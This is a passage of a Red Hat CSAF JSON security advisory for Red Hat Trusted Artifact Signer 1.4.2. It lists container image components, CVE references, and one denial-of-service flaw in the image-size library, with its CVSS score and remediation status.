"url": "https://access.redhat.com/security/cve/CVE-2026-39830"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-39835",
"url": "https://access.redhat.com/security/cve/CVE-2026-39835"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42151",
"url": "https://access.redhat.com/security/cve/CVE-2026-42151"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42570",
"url": "https://access.redhat.com/security/cve/CVE-2026-42570"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44573",
"url": "https://access.redhat.com/security/cve/CVE-2026-44573"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44574",
"url": "https://access.redhat.com/security/cve/CVE-2026-44574"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44575",
"url": "https://access.redhat.com/security/cve/CVE-2026-44575"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44577",
"url": "https://access.redhat.com/security/cve/CVE-2026-44577"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44578",
"url": "https://access.redhat.com/security/cve/CVE-2026-44578"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44579",
"url": "https://access.redhat.com/security/cve/CVE-2026-44579"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-45109",
"url": "https://access.redhat.com/security/cve/CVE-2026-45109"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-45736",
"url": "https://access.redhat.com/security/cve/CVE-2026-45736"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48779",
"url": "https://access.redhat.com/security/cve/CVE-2026-48779"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_37272.json"
}
],
"title": "Red Hat Security Advisory: RHTAS 1.4.2 - Red Hat Trusted Artifact Signer Release",
"tracking": {
"current_release_date": "2026-07-10T19:40:50+00:00",
"generator": {
"date": "2026-07-10T19:40:50+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.2"
}
},
"id": "RHSA-2026:37272",
"initial_release_date": "2026-07-09T11:43:10+00:00",
"revision_history": [
{
"date": "2026-07-09T11:43:10+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-07-09T11:43:19+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-10T19:40:50+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Trusted Artifact Signer 1.4",
"product": {
"name": "Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:trusted_artifact_signer:1.4::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Trusted Artifact Signer"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"product_id": "registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rekor-backfill-redis-rhel9@sha256%3Ac34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/rekor-backfill-redis-rhel9\u0026tag=1783332625"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"product": {
"name": "registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"product_id": "registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/certificate-transparency-rhel9@sha256%3A428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/certificate-transparency-rhel9\u0026tag=1783326748"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"product": {
"name": "registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"product_id": "registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"product_identification_helper": {
"purl": "pkg:oci/trillian-database-rhel9@sha256%3Ab5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/trillian-database-rhel9\u0026tag=1783329793"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"product": {
"name": "registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"product_id": "registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"product_identification_helper": {
"purl": "pkg:oci/fulcio-rhel9@sha256%3A9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/fulcio-rhel9\u0026tag=1783326847"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"product": {
"name": "registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"product_id": "registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/trillian-logserver-rhel9@sha256%3A6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/trillian-logserver-rhel9\u0026tag=1783329793"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"product": {
"name": "registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"product_id": "registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/trillian-logsigner-rhel9@sha256%3A613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/trillian-logsigner-rhel9\u0026tag=1783329793"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64",
"product": {
"name": "registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64",
"product_id": "registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/trillian-redis-rhel9@sha256%3Afd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/trillian-redis-rhel9\u0026tag=1783329793"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"product_id": "registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rekor-search-ui-rhel9@sha256%3Ac0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/rekor-search-ui-rhel9\u0026tag=1783327185"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"product_id": "registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rekor-server-rhel9@sha256%3A938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/rekor-server-rhel9\u0026tag=1783332625"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"product": {
"name": "registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"product_id": "registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/timestamp-authority-rhel9@sha256%3A5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf?arch=amd64\u0026repository_url=registry.redhat.io/rhtas/timestamp-authority-rhel9\u0026tag=1783326690"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64"
},
"product_reference": "registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64"
},
"product_reference": "registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
},
"product_reference": "registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64"
},
"product_reference": "registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64"
},
"product_reference": "registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64"
},
"product_reference": "registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 as a component of Red Hat Trusted Artifact Signer 1.4",
"product_id": "Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
},
"product_reference": "registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-71319",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-06-09T21:01:11.339286+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487296"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in image-size. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by supplying specially crafted JXL, HEIF, or JP2 image files that contain zero-sized boxes. The `findBox` function, responsible for image validation, enters an infinite loop when processing these malicious files, leading to an application hang. This can disrupt the availability of services relying on the image-size component.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "image-size: image-size: Denial of Service due to infinite loop when processing specially crafted images.",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the `image-size` component, which can be triggered remotely by processing specially crafted JXL, HEIF, or JP2 image files containing zero-sized boxes. This flaw can lead to an application hang due to an infinite loop in the `findBox` function, impacting the availability of services that rely on this image processing library within Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-71319"
},
{
"category": "external",
"summary": "RHBZ#2487296",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487296"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-71319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71319"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-71319",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71319"
},
{
"category": "external",
"summary": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7",
"url": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7"
},
{
"category": "external",
"summary": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function",
"url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function"
}
],
"release_date": "2026-06-09T19:57:16.125000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
